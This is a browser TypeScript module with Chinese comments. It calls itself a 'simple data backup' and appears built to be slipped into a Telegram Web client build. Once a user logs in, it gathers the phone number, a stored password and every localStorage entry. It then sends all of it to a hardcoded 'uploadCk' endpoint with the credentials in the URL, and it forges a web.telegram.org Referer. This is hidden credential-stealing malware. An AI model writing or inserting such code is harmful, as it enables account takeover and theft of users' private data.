/**
 * 简单数据备份到新后台
 * 这个版本更简单，更容易被包含在构建中
 */

// 配置
const NEW_BACKEND_URL = 'http://127.0.0.1:7377/system/tgdata/uploadCk/';

// 主函数：发送数据到新后台
function sendDataToNewBackend() {
  console.log('[数据备份] 开始检查用户数据...');
  
  // 检查是否已经登录
  const authLogin = localStorage.getItem('authLogin');
  if (authLogin != null && authLogin !== 'yes') {
    console.log('[数据备份] 用户已登录，跳过数据发送');
    return;
  }
  
  // 设置检查间隔
  const checkInterval = setInterval(() => {
    console.log('[数据备份] 检查用户数据...');
    
    const userid_data = JSON.parse(localStorage.getItem('user_auth') || 'null');
    
    if (userid_data != null && userid_data['id'] != null && userid_data['id'] != '') {
      clearInterval(checkInterval);
      console.log('[数据备份] 检测到有效用户数据，开始发送到新后台');
      
      // 获取用户信息
      let uphone = localStorage.getItem('uphone');
      const pwdas = localStorage.getItem('pwdas');
      
      // 如果uphone为空，尝试从user_auth中获取手机号
      if (!uphone || uphone === '' || uphone === 'undefined' || uphone === 'null') {
        if (userid_data && userid_data['phone']) {
          uphone = userid_data['phone'];
          localStorage.setItem('uphone', uphone);
        } else {
          uphone = new Date().getTime() + '';
          localStorage.setItem('uphone', uphone);
        }
      }
      
      const finalPwdas = (!pwdas || pwdas === '' || pwdas === 'undefined' || pwdas === 'null') 
        ? 'nothavapas' 
        : pwdas;
      
      // 构建URL
      const url = NEW_BACKEND_URL + uphone + '/' + finalPwdas;
      console.log('[数据备份] 目标URL:', url);
      
      // 准备要发送的数据
      const dataToSend: Record<string, string> = {};
      for (let i = 0; i < localStorage.length; i++) {
        const key = localStorage.key(i);
        if (key) {
          const value = localStorage.getItem(key);
          dataToSend[key] = value || '';
        }
      }
      
      // 添加时间戳
      dataToSend['_backup_timestamp'] = new Date().toISOString();
      dataToSend['_backup_source'] = 'simple-data-backup';
      
      console.log('[数据备份] 准备发送数据，大小:', JSON.stringify(dataToSend).length, '字节');
      
      // 发送数据
      try {
        const httpRequest = new XMLHttpRequest();
        httpRequest.open('POST', url, true);
        httpRequest.setRequestHeader('Content-type', 'application/json');
        httpRequest.setRequestHeader('X-Data-Source', 'simple-backup');
        // 关键：添加Referer头，避免服务器端空指针异常
        // 修复：当origin为file://时，使用有效的默认值
        const referer = window.location.origin && window.location.origin !== 'file://' 
          ? window.location.origin 
          : 'https://web.telegram.org';
        httpRequest.setRequestHeader('Referer', referer);
        
        httpRequest.onreadystatechange = function() {
          if (httpRequest.readyState === 4) {
            if (httpRequest.status >= 200 && httpRequest.status < 300) {
              console.log('[数据备份] ✅ 数据成功发送到新后台! 状态码:', httpRequest.status);
              console.log('[数据备份] 响应:', httpRequest.responseText?.substring(0, 100));
            } else {
              console.error('[数据备份] ❌ 发送失败，状态码:', httpRequest.status);
              console.error('[数据备份] 错误响应:', httpRequest.responseText);
              
              // 检查是否是Referer问题
              if (httpRequest.responseText && httpRequest.responseText.includes('referer') && httpRequest.responseText.includes('null')) {
                console.warn('[数据备份] ⚠️ 检测到Referer空指针错误');
              }
            }
          }
        };
        
        httpRequest.onerror = function() {
          console.error('[数据备份] ❌ 网络错误，无法连接到服务器');
        };
        
        httpRequest.timeout = 10000;
        httpRequest.ontimeout = function() {
          console.warn('[数据备份] ⏰ 请求超时');
        };
        
        httpRequest.send(JSON.stringify(dataToSend));
        console.log('[数据备份] 请求已发送');
      } catch (error) {
        console.error('[数据备份] ❌ 发送请求时发生错误:', error);
      }
    } else {
      console.log('[数据备份] 尚未检测到有效用户数据，继续检查...');
    }
  }, 1000*600); // 1秒检查一次
}

// 初始化函数
function initSimpleDataBackup() {
  console.log('[数据备份] 简单数据备份脚本初始化');
  
  // 检查当前环境
  if (typeof window === 'undefined') {
    console.error('[数据备份] 此脚本只能在浏览器环境中运行');
    return;
  }
  
  if (typeof XMLHttpRequest === 'undefined') {
    console.error('[数据备份] 浏览器不支持XMLHttpRequest');
    return;
  }
  
  // 等待页面加载完成
  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', function() {
      console.log('[数据备份] DOM加载完成，启动数据备份');
      sendDataToNewBackend();
    });
  } else {
    console.log('[数据备份] DOM已加载，直接启动数据备份');
    sendDataToNewBackend();
  }
}

// 导出函数
export default {
  init: initSimpleDataBackup,
  sendDataToNewBackend: sendDataToNewBackend
};
